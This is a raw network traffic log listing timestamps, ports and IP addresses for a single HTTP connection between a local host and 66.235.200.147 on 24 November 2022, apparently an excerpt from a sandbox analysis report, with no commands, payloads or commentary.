Nov 24, 2022 12:19:59.828248024 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.828263044 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.828284025 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.828294039 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.828319073 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.828327894 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.828353882 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.828363895 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.828392029 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.828427076 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.828437090 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.828463078 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.828468084 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.828496933 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.828507900 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.828541040 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.828574896 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.828586102 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.828619003 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.828623056 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.828669071 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.828672886 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.828720093 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.828763008 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.828772068 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.828807116 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.828851938 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.828855991 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.828896999 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.828896999 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.828943014 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.828986883 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.828988075 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.829054117 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.829097986 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.829102039 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.829143047 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.829144001 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.829188108 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.829232931 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.829232931 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.829277039 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.829278946 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.829307079 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.829323053 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.829338074 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.829366922 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.829370022 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.829410076 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.829416037 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.829454899 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.829463005 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.829500914 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.829502106 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.829545975 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.829579115 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.829591036 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.829593897 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.829638958 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.829680920 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.829689980 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.829725027 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.829767942 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.829778910 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.829813004 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.829817057 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.829858065 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.829900980 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.829909086 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.829945087 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.829988956 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.829994917 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830032110 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830038071 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830075979 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830120087 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830125093 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830164909 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830208063 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830214024 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830250978 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830251932 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830293894 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830337048 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830369949 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830389023 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830415964 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830423117 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830423117 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830437899 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830459118 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830459118 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830480099 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830488920 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830499887 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830507994 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830519915 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830528975 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830539942 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830550909 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830560923 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830573082 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830581903 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830595970 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830604076 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830619097 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830625057 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830640078 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830647945 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830665112 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830668926 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830686092 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830691099 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830708027 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830713987 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830729961 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830735922 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830749989 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830758095 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830770969 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830777884 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830791950 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830800056 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830816031 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830821991 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830835104 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830845118 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830857038 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830864906 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830893040 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830905914 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830910921 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830928087 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830940008 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830949068 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830956936 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830971003 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.830988884 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.830991030 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.831007004 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.831012011 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.831032991 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.831032991 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.831053019 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.831063986 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.831073999 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.831094980 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.831124067 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.849534988 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.849580050 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.849638939 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.849658966 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.849678993 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.849699974 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.849725008 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.849742889 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.849813938 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.849888086 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.849984884 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.850004911 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.850023985 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.850045919 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.850061893 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.850064039 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.850085974 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.850090981 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.850115061 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.850126982 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.850147009 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.850162983 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.850198984 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.850235939 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.850240946 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.850256920 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.850274086 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.850285053 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.850296021 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.850306988 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.850332022 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.850348949 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.850354910 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.850375891 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.850383997 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.850397110 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.850404024 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.850416899 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.850424051 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.850439072 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.850445032 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.850461006 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.850467920 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.850481033 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.850486040 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.850502014 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.850509882 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.850533009 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.850543022 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.850559950 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.850603104 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.850754976 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.851052046 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.868007898 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868057013 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868081093 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868104935 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868129969 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868154049 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868175983 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868199110 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868221998 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868244886 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868268013 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868289948 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868313074 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868336916 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868359089 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868381023 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868402004 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868424892 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868446112 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868468046 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868465900 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.868490934 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868515968 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868537903 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868540049 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.868562937 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868566990 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.868585110 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868612051 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868617058 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.868635893 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868649006 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.868659973 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868683100 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868705034 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.868705988 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868731022 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868747950 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.868753910 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868777037 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868799925 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868801117 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.868824005 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868845940 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.868846893 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868871927 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868895054 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868896961 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.868917942 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868938923 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.868940115 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868963957 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868985891 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.868990898 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.869009018 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.869030952 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.869036913 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.869050980 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.869074106 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.869082928 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.869091988 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.869115114 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.872198105 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.872245073 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.872277021 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.872308969 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.872339010 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.872366905 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.872370005 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.872399092 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.872414112 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.872430086 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.872458935 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.872462034 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.872494936 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.872529030 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.872544050 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.872560978 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.872585058 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.872591972 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.872625113 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.872643948 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.872658968 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.872689009 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.872719049 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.872736931 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.872747898 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.872766018 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.872778893 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.872811079 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.872823954 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.872842073 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.872870922 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.872900963 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.872912884 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.872931004 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.872945070 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.872961044 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.872987032 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873007059 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.873018026 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873050928 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873065948 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.873081923 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873112917 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873142004 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873164892 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.873172045 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873191118 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.873203039 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873233080 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873262882 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873269081 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.873295069 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873323917 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873342037 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.873354912 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873368979 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.873387098 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873415947 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873430014 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.873445988 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873475075 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873488903 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.873506069 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873536110 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873549938 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.873567104 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873598099 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873626947 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873642921 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.873655081 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873676062 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.873684883 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873716116 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873744965 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873759985 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.873770952 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873789072 CET	49708	80	192.168.2.3	66.235.200.147
